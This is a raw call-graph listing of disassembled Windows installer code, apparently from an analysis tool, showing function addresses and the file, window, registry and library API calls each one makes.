4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3869 4045c4 3780->3869 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 SetClassLongW 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3855 40462b 3796->3855 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3852 40459d 3823->3852 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4045a4 3852->3853 3854 4045aa SendMessageW 3852->3854 3853->3854 3854->3816 3856 4046ee 3855->3856 3857 404643 GetWindowLongW 3855->3857 3856->3794 3857->3856 3858 404658 3857->3858 3858->3856 3859 404685 GetSysColor 3858->3859 3860 404688 3858->3860 3859->3860 3861 404698 SetBkMode 3860->3861 3862 40468e SetTextColor 3860->3862 3863 4046b0 GetSysColor 3861->3863 3864 4046b6 3861->3864 3862->3861 3863->3864 3865 4046c7 3864->3865 3866 4046bd SetBkColor 3864->3866 3865->3856 3867 4046e1 CreateBrushIndirect 3865->3867 3868 4046da DeleteObject 3865->3868 3866->3865 3867->3856 3868->3867 3870 4066a5 17 API calls 3869->3870 3871 4045cf SetDlgItemTextW 3870->3871 3871->3789 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 CloseHandle 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 